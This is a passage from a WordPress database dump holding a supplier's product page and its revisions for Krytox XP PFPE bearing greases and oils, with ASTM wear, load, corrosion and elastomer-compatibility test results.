51</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p>Krytox XP <a href="https://www.miller-stephenson.com/product/xp-1a5/">1A5</a> oil showed a reduction of 47% in torque over the same viscosity oil with no additive.</p>\n<p>Block on Ring tests were run per <a href="https://www.astm.org/Standards/D2714.htm">ASTM D2714</a>. The test runs at 72 rpm, with a 100 lb normal load for 5,000 cycles. The test is a line contact configuration. The size of the wear scar on the test block is measured. The<br />\nspecimen assembly is partially immersed in the lubricant sample during the test. This method tests the wear prevention properties of the oil.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td style="text-align: center;" width="180">Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td style="text-align: center;">0.8</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td style="text-align: center;">0.7</td>\n</tr>\n</tbody>\n</table>\n<p>Krytox XP 1A5 oil showed a reduction of 12% in wear over the same viscosity oil with no additive.</p>\n<p><img class="wp-image-3162 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test-800x370.jpg" alt="krytox-xp-scar-test" width="467" height="216" /></p>\n<p>Pin and Vee Block Coupons (Large wear scar on left is from oil with no additives; the smaller scar on the right shows the effect of Krytox XP additives.)</p>\n<p><strong>Bearing Noise</strong><br />\nSolid particles in grease cause bearing noise, and very large particles can lead to early failure of the bearing. Small bearings and electrical motor bearings are commonly plagued by noise. Krytox XP<br />\nproducts with soluble additives minimize noise. Various greases were tested to show the effects of particles on noise level in bearings. Any readings above 25 on the low or high band is considered unacceptable for<br />\nelectric motor quality. Any amplitude greater than one grid on the oscilloscope is also unacceptable for electric motor quality.</p>\n<p><img class="alignnone wp-image-3165" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg" alt="krytox-xp-grease-test" width="452" height="177" /></p>\n<p><strong>Anti-Corrosion Protection</strong><br />\nPerformance of the soluble additives in the Krytox XP line is superior to additives that are commonly used for anti-corrosion protection in PFPE grease.</p>\n<p>The corrosion prevention performance of oil with the soluble additive was tested against a PFPE oil with no additives using a modified version of <a href="https://www.astm.org/Standards/D665.htm">ASTM D665</a>. Cylindrical C-1018 steel coupons were cleaned and<br />\ncoated with oil. They were allowed to drip for 1 hr, and then placed into a water bath that was stirred and held at 80 °C (176 °F). They were examined at routine intervals for corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water normally found in industrial applications, and is somewhat corrosive and similar in action to saltwater.</p>\n<table class=" aligncenter" width="579">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td style="text-align: center;" width="180">Time to Initial Corrosion</td>\n<td style="text-align: center;" width="180">Final Corrosion Rating at 24 hr</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td style="text-align: center;">Less Than 1 hr</td>\n<td style="text-align: center;">Severe Rusting</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td style="text-align: center;">None</td>\n<td style="text-align: center;">No rusting visible</td>\n</tr>\n</tbody>\n</table>\n<p>An additional test was run with corrosion coupons in 80 °C (176 °F) agitated hard water for five weeks with no rusting visible.</p>\n<p>Bearing corrosion prevention performance of grease with the soluble additive was tested against a PFPE grease with no additives and against a PFPE grease with standard anti-corrosion additives using the IP-220 (EMCOR) test method. This method uses a double row self-aligning bearing that is packed with grease. It is a dynamic test that runs partially submerged in water for 8 hr, sits for 16 hr, runs again for 8 hr, sits for 16 hr, runs again for 8 hr, and then allowed to sit for an additional 108 hr, which gives a test time of one week. At this time, the bearing is disassembled, and the outer race is examined for rusting. The outer race is rated from 0–5 on a standard rating scale, with 0 having no corrosion and 5 having more than 10% of the surface covered with corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water that normally would be found in industrial applications and similar in corrosion action to saltwater.</p>\n<p><img class="alignnone wp-image-3166" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg" alt="krytox-xp-final-corrosion-rating" width="414" height="141" /></p>\n<p>Corrosion prevention was also tested by <a href="https://www.astm.org/Standards/B117.htm">ASTM B117</a>, salt spray test. A polished steel test panel that was coated with a 4 mil coating of Krytox XP 2A5 grease and exposed to a 5% salt solution at 95 °C (203 °F) for 100 hr passed with no corrosion forming.</p>\n<p>Grease corrosion prevention was also tested by <a href="https://www.astm.org/Standards/D1743.htm">ASTM D1743</a>. This test uses greased tapered roller bearings that are rotated to spread the grease, and then are dipped in water and stored in a 100% relative humidity<br />\nenvironment for two days. The Krytox XP 2A5 grease passed with no rusting.</p>\n<p><img class="wp-image-3161 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test-800x383.jpg" alt="krytox-xp-bearing-test" width="560" height="268" /></p>\n<p>The bearing race on the left clearly shows there is no corrosion when Krytox XP additive is present, the bearing in the center shows traces of rust with standard additives, and the bearing on the right shows heavy rusting with no additives.</p>\n<p><strong>Corrosion-Oxidation Stability Test</strong></p>\n<p>Krytox XP oils have been tested in the Corrosion-Oxidation Stability test as per Federal Test Method 791C, 5308.7. This method tests the ability of oils to resist oxidation and their tendency to corrode<br />\nvarious metals. Metal specimens are suspended in oil at elevated temperature, and air is blown through the mix. After completion, the oil is tested to determine the extent of degradation, and the metal coupons are examined for corrosion.</p>\n<p><strong>Results on Krytox XP 1A5 oil after 168 hr at 122 °C (250 °F)</strong><br />\nEvaporation loss 1.0%<br />\nIncrease in viscosity 1.7%</p>\n<p>&nbsp;</p>\n<p><strong>Change in weight of metals, mg/cm^2</strong></p>\n<table width="399">\n<tbody>\n<tr>\n<td width="219">Copper</td>\n<td width="180">-0.59</td>\n</tr>\n<tr>\n<td>Copper Alloy 932</td>\n<td>-0.22</td>\n</tr>\n<tr>\n<td>Cadmium</td>\n<td>-0.01</td>\n</tr>\n<tr>\n<td>Aluminum</td>\n<td>0</td>\n</tr>\n<tr>\n<td>Steel</td>\n<td>0</td>\n</tr>\n<tr>\n<td>Magnesium</td>\n<td>0.01</td>\n</tr>\n</tbody>\n</table>\n<p><strong>Elastomer Compatibility</strong><br />\nElastomer compatibility screening was conducted on Krytox XP products. Additional testing is being performed to fully characterize if materials are affected by additives in Krytox XP products. The table below lists the percentage of swelling after 168 or 672 hr of exposure.</p>\n<p>Mylar® polyester film and Teflon™ fluoropolymer have been tested with no damage, and additional elastomers are currently being tested for compatibility with the additives. Kalrez® perfluoroelastomer parts show the same swell that happens with pure Krytox at high temperatures. Caution should be used with unlisted materials until compatibility testing is completed.</p>\n<p><img class="alignnone wp-image-3167" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg" alt="krytox-xp-plastic" width="443" height="230" /></p>\n<p><strong>Storage and Shelf Life</strong><br />\nKrytox XP series lubricants can develop an odor and a slight amber/pinkish color over time. The Krytox XP series has a three-year shelf life and recommended maximum operating temperature of 182 °C (360 °F). Testing has shown that these products retain their anti-rust and anti-wear properties, and perform well past the end of the recommended three-year shelf life. Keep product sealed and store in a cool, dry place.</p>\n[share title="Social Share XP"]\n\n[ux_product_categories ids="170,169" number="10"]\n\n<p>&nbsp;</p>', 'Krytox XP - Bearing Grease & Oil with Soluble Additives', '', 'publish', 'closed', 'closed', '', 'krytox-xp', '', '', '2016-11-29 15:19:39', '2016-11-29 15:19:39', '', 0, 'https://www.miller-stephenson.com/?p=3160', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3161, 2, '2016-11-29 14:26:35', '2016-11-29 14:26:35', '', 'krytox-xp-bearing-test', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-bearing-test', '', '', '2016-11-29 14:26:35', '2016-11-29 14:26:35', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3162, 2, '2016-11-29 14:30:35', '2016-11-29 14:30:35', '', 'krytox-xp-scar-test', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-scar-test', '', '', '2016-11-29 14:30:35', '2016-11-29 14:30:35', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3163, 2, '2016-11-29 14:33:01', '2016-11-29 14:33:01', '', 'krytox-xp-comparison-chart', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-comparison-chart', '', '', '2016-11-29 14:33:01', '2016-11-29 14:33:01', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3164, 2, '2016-11-29 14:36:54', '2016-11-29 14:36:54', '', 'krytox-xp-load-wear-index', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-load-wear-index', '', '', '2016-11-29 14:36:54', '2016-11-29 14:36:54', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3165, 2, '2016-11-29 14:42:46', '2016-11-29 14:42:46', '', 'krytox-xp-grease-test', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-grease-test', '', '', '2016-11-29 14:42:46', '2016-11-29 14:42:46', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3166, 2, '2016-11-29 14:58:19', '2016-11-29 14:58:19', '', 'krytox-xp-final-corrosion-rating', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-final-corrosion-rating', '', '', '2016-11-29 14:58:19', '2016-11-29 14:58:19', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3167, 2, '2016-11-29 14:59:20', '2016-11-29 14:59:20', '', 'krytox-xp-plastic', '', 'inherit', 'closed', 'closed', '', 'krytox-xp-plastic', '', '', '2016-11-29 14:59:20', '2016-11-29 14:59:20', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3168, 2, '2016-11-29 15:02:53', '2016-11-29 15:02:53', '', 'Krytox XP', '', 'inherit', 'closed', 'closed', '', 'shutterstock_523475344', '', '', '2016-11-29 15:03:01', '2016-11-29 15:03:01', '', 3160, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_523475344.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3169, 0, '2016-11-29 15:03:01', '2016-11-29 15:03:01', '', '', '', 'publish', 'closed', 'closed', '', '3169', '', '', '2016-11-29 15:03:01', '2016-11-29 15:03:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3169/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3170, 2, '2016-11-29 15:16:42', '2016-11-29 15:16:42', '<h3>Krytox XP Product Information</h3>\r\nKrytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives.\r\n\r\nThe Krytox line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\nKrytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.\r\n\r\nKrytox XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection\r\nagainst corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.\r\n\r\nWhile Krytox oils are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox XP products are new and have not been tested with all materials. It is possible that some reactivity and damage could occur to some materials. Initial testing has shown no problems with Teflon™ fluoropolymer, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. There is some reactivity of the additive with copper, but less so with brass. These additives have not been tested at all temperatures, and degradation of performance could occur at elevated temperatures over a long period of time.\r\n\r\n<img class="alignnone size-full wp-image-3163" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg" alt="krytox-xp-comparison-chart" width="1388" height="560" />\r\n\r\n&nbsp;\r\n\r\n<strong>Performance</strong>\r\n\r\nWear testing of the additive was done using standard laboratory tests to demonstrate improved performance. Four Ball Wear tests on oil with the additive compared to oil with no additive were run according to <a href="https://www.astm.org/Standards/D4172.htm">ASTM D4172</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. The wear scar was measured using a microscope. This method tests the wear prevention properties of the oils.\r\n<p style="text-align: left;">Four Ball Wear tests on grease with the additive compared to grease with a typical solid additive were run according to <a href="https://www.astm.org/Standards/D2266.htm">ASTM D2266</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. Krytox XP 1A5 oil showed a reduction of 34% in wear over the same viscosity oil with no additive.</p>\r\n\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  0.44</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  0.29</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThe wear scar was measured using a microscope. This method tests the wear prevention properties of the greases.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Grease</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 225</td>\r\n<td>                 0.42</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2A5</td>\r\n<td>                 0.34</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">2A5</a> grease showed a reduction of 19% in wear over a current grease with the same viscosity oil and with additives to reduce wear and corrosion.\r\n\r\nFour Ball EP tests were run on grease and oil according to <a href="https://www.astm.org/Standards/D2783.htm">ASTM D2783</a> for oil and <a href="https://www.astm.org/Standards/D2596.htm">ASTM D2596</a> for grease. This method tests the extreme pressure properties of the oil or additive and its ability to carry heavy loads.\r\n\r\n<img class="alignnone size-full wp-image-3164" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg" alt="krytox-xp-load-wear-index" width="682" height="176" />\r\n\r\nWater washout of grease from a bearing was tested by <a href="https://www.astm.org/Standards/D1264.htm">ASTM D1264</a> at 79 °C (175 °F).\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219">Test Grease</td>\r\n<td style="text-align: center;" width="180">Grease Removed</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Krytox XP 2A5</td>\r\n<td style="text-align: center;">0.25%</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nPin and Vee Block tests were conducted according to <a href="https://www.astm.org/Standards/D3233.htm">ASTM D3233</a>. The test is a load to failure test that uses progressive loading on Vee blocks that squeeze a shaft rotating at 290 rpm. The test terminates when the shaft seizes and breaks a shear pin or the machine reaches its top loading of 3,000 lb on the load pressure gauge. The test pieces are submerged in oil. This method tests the extreme pressure properties of the oil or additive. These tests were run starting at room temperature.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">Maximum Load Reached,                      lb</td>\r\n<td width="180">       Final Torque, in lb</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  3,000</td>\r\n<td>                    96</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  3,000</td>\r\n<td>                    51</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/xp-1a5/">1A5</a> oil showed a reduction of 47% in torque over the same viscosity oil with no additive.\r\n\r\nBlock on Ring tests were run per <a href="https://www.astm.org/Standards/D2714.htm">ASTM D2714</a>. The test runs at 72 rpm, with a 100 lb normal load for 5,000 cycles. The test is a line contact configuration. The size of the wear scar on the test block is measured. The\r\nspecimen assembly is partially immersed in the lubricant sample during the test. This method tests the wear prevention properties of the oil.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">0.8</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">0.7</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP 1A5 oil showed a reduction of 12% in wear over the same viscosity oil with no additive.\r\n\r\n<img class="wp-image-3162 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-scar-test-800x370.jpg" alt="krytox-xp-scar-test" width="467" height="216" />\r\n\r\nPin and Vee Block Coupons (Large wear scar on left is from oil with no additives; the smaller scar on the right shows the effect of Krytox XP additives.)\r\n\r\n<strong>Bearing Noise</strong>\r\nSolid particles in grease cause bearing noise, and very large particles can lead to early failure of the bearing. Small bearings and electrical motor bearings are commonly plagued by noise. Krytox XP\r\nproducts with soluble additives minimize noise. Various greases were tested to show the effects of particles on noise level in bearings. Any readings above 25 on the low or high band is considered unacceptable for\r\nelectric motor quality. Any amplitude greater than one grid on the oscilloscope is also unacceptable for electric motor quality.\r\n\r\n<img class="alignnone  wp-image-3165" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-grease-test.jpg" alt="krytox-xp-grease-test" width="452" height="177" />\r\n\r\n<strong>Anti-Corrosion Protection</strong>\r\nPerformance of the soluble additives in the Krytox XP line is superior to additives that are commonly used for anti-corrosion protection in PFPE grease.\r\n\r\nThe corrosion prevention performance of oil with the soluble additive was tested against a PFPE oil with no additives using a modified version of <a href="https://www.astm.org/Standards/D665.htm">ASTM D665</a>. Cylindrical C-1018 steel coupons were cleaned and\r\ncoated with oil. They were allowed to drip for 1 hr, and then placed into a water bath that was stirred and held at 80 °C (176 °F). They were examined at routine intervals for corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water normally found in industrial applications, and is somewhat corrosive and similar in action to saltwater.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td style="text-align: center;" width="180">Time to Initial Corrosion</td>\r\n<td style="text-align: center;" width="180">Final Corrosion Rating at 24 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td style="text-align: center;">Less Than 1 hr</td>\r\n<td style="text-align: center;">Severe Rusting</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">No rusting visible</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nAn additional test was run with corrosion coupons in 80 °C (176 °F) agitated hard water for five weeks with no rusting visible.\r\n\r\nBearing corrosion prevention performance of grease with the soluble additive was tested against a PFPE grease with no additives and against a PFPE grease with standard anti-corrosion additives using the IP-220 (EMCOR) test method. This method uses a double row self-aligning bearing that is packed with grease. It is a dynamic test that runs partially submerged in water for 8 hr, sits for 16 hr, runs again for 8 hr, sits for 16 hr, runs again for 8 hr, and then allowed to sit for an additional 108 hr, which gives a test time of one week. At this time, the bearing is disassembled, and the outer race is examined for rusting. The outer race is rated from 0–5 on a standard rating scale, with 0 having no corrosion and 5 having more than 10% of the surface covered with corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water that normally would be found in industrial applications and similar in corrosion action to saltwater.\r\n\r\n<img class="alignnone  wp-image-3166" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg" alt="krytox-xp-final-corrosion-rating" width="414" height="141" />\r\n\r\nCorrosion prevention was also tested by <a href="https://www.astm.org/Standards/B117.htm">ASTM B117</a>, salt spray test. A polished steel test panel that was coated with a 4 mil coating of Krytox XP 2A5 grease and exposed to a 5% salt solution at 95 °C (203 °F) for 100 hr passed with no corrosion forming.\r\n\r\nGrease corrosion prevention was also tested by <a href="https://www.astm.org/Standards/D1743.htm">ASTM D1743</a>. This test uses greased tapered roller bearings that are rotated to spread the grease, and then are dipped in water and stored in a 100% relative humidity\r\nenvironment for two days. The Krytox XP 2A5 grease passed with no rusting.\r\n\r\n<img class="wp-image-3161 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test-800x383.jpg" alt="krytox-xp-bearing-test" width="560" height="268" />\r\n\r\nThe bearing race on the left clearly shows there is no corrosion when Krytox XP additive is present, the bearing in the center shows traces of rust with standard additives, and the bearing on the right shows heavy rusting with no additives.\r\n\r\n<strong>Corrosion-Oxidation Stability Test</strong>\r\n\r\nKrytox XP oils have been tested in the Corrosion-Oxidation Stability test as per Federal Test Method 791C, 5308.7. This method tests the ability of oils to resist oxidation and their tendency to corrode\r\nvarious metals. Metal specimens are suspended in oil at elevated temperature, and air is blown through the mix. After completion, the oil is tested to determine the extent of degradation, and the metal coupons are examined for corrosion.\r\n\r\n<strong>Results on Krytox XP 1A5 oil after 168 hr at 122 °C (250 °F)</strong>\r\nEvaporation loss 1.0%\r\nIncrease in viscosity 1.7%\r\n\r\n&nbsp;\r\n\r\n<strong>Change in weight of metals, mg/cm^2</strong>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Copper</td>\r\n<td width="180">-0.59</td>\r\n</tr>\r\n<tr>\r\n<td>Copper Alloy 932</td>\r\n<td>-0.22</td>\r\n</tr>\r\n<tr>\r\n<td>Cadmium</td>\r\n<td>-0.01</td>\r\n</tr>\r\n<tr>\r\n<td>Aluminum</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Steel</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>Magnesium</td>\r\n<td>0.01</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Elastomer Compatibility</strong>\r\nElastomer compatibility screening was conducted on Krytox XP products. Additional testing is being performed to fully characterize if materials are affected by additives in Krytox XP products. The table below lists the percentage of swelling after 168 or 672 hr of exposure.\r\n\r\nMylar® polyester film and Teflon™ fluoropolymer have been tested with no damage, and additional elastomers are currently being tested for compatibility with the additives. Kalrez® perfluoroelastomer parts show the same swell that happens with pure Krytox at high temperatures. Caution should be used with unlisted materials until compatibility testing is completed.\r\n\r\n<img class="alignnone  wp-image-3167" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg" alt="krytox-xp-plastic" width="443" height="230" />\r\n\r\n<strong>Storage and Shelf Life</strong>\r\nKrytox XP series lubricants can develop an odor and a slight amber/pinkish color over time. The Krytox XP series has a three-year shelf life and recommended maximum operating temperature of 182 °C (360 °F). Testing has shown that these products retain their anti-rust and anti-wear properties, and perform well past the end of the recommended three-year shelf life. Keep product sealed and store in a cool, dry place.\r\n\r\n[share title="Social Share XP"]\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox XP Oil &amp; Grease" ]\r\n\r\n&nbsp;', 'Krytox XP - Bearing Grease & Oil with Soluble Additives', '', 'inherit', 'closed', 'closed', '', '3160-revision-v1', '', '', '2016-11-29 15:16:42', '2016-11-29 15:16:42', '', 3160, 'https://www.miller-stephenson.com/3160-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3171, 2, '2016-11-29 15:17:48', '2016-11-29 15:17:48', '<h3>Krytox XP Product Information</h3>\r\nKrytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives.\r\n\r\nThe Krytox line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.\r\n\r\nKrytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.\r\n\r\nKrytox XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection\r\nagainst corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.\r\n\r\nWhile Krytox oils are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox XP products are new and have not been tested with all materials. It is possible that some reactivity and damage could occur to some materials. Initial testing has shown no problems with Teflon™ fluoropolymer, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. There is some reactivity of the additive with copper, but less so with brass. These additives have not been tested at all temperatures, and degradation of performance could occur at elevated temperatures over a long period of time.<img class="alignnone size-full wp-image-3163" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg" alt="krytox-xp-comparison-chart" width="1388" height="560" />\r\n\r\n&nbsp;\r\n\r\n<strong>Performance</strong>\r\n\r\nWear testing of the additive was done using standard laboratory tests to demonstrate improved performance. Four Ball Wear tests on oil with the additive compared to oil with no additive were run according to <a href="https://www.astm.org/Standards/D4172.htm">ASTM D4172</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. The wear scar was measured using a microscope. This method tests the wear prevention properties of the oils.\r\n<p style="text-align: left;">Four Ball Wear tests on grease with the additive compared to grease with a typical solid additive were run according to <a href="https://www.astm.org/Standards/D2266.htm">ASTM D2266</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. Krytox XP 1A5 oil showed a reduction of 34% in wear over the same viscosity oil with no additive.</p>\r\n\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 105</td>\r\n<td>                  0.44</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A5</td>\r\n<td>                  0.29</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThe wear scar was measured using a microscope. This method tests the wear prevention properties of the greases.\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Grease</td>\r\n<td width="180">     Wear Scar Size, mm</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 225</td>\r\n<td>                 0.42</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2A5</td>\r\n<td>                 0.34</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nKrytox XP <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">2A5</a> grease showed a reduction of 19% in wear over a current grease with the same viscosity oil and with additives to reduce wear and corrosion.\r\n\r\nFour Ball EP tests were run on grease and oil according to <a href="https://www.astm.org/Standards/D2783.htm">ASTM D2783</a> for oil and <a href="https://www.astm.org/Standards/D2596.htm">ASTM D2596</a> for grease. This method tests the extreme pressure properties of the oil or additive and its ability to carry heavy loads.\r\n\r\n<img class="alignnone size-full wp-image-3164" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg" alt="krytox-xp-load-wear-index" width="682" height="176" />\r\n\r\nWater washout of grease from a bearing was tested by <a href="https://www.astm.org/Standards/D1264.htm">ASTM D1264</a> at 79 °C (175 °F).\r\n<table class=" aligncenter" width="399">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219">Test Grease</td>\r\n<td style="text-align: center;" width="180">Grease Removed</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Krytox XP 2A5</td>\r\n<td style="text-align: center;">0.25%</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nPin and Vee Block tests were conducted according to <a href="https://www.astm.org/Standards/D3233.htm">ASTM D3233</a>. The test is a load to failure test that uses progressive loading on Vee blocks that squeeze a shaft rotating at 290 rpm. The test terminates when the shaft seizes and breaks a shear pin or the machine reaches its top loading of 3,000 lb on the load pressure gauge. The test pieces are submerged in oil. This method tests the extreme pressure properties of the oil or additive. These tests were run starting at room temperature.\r\n<table class=" aligncenter" width="579">\r\n<tbody>\r\n<tr>\r\n<td width="219">Test Oil</td>\r\n<td width="180">Maximum Load Reached,                      lb</td>\r\n<td width="180">       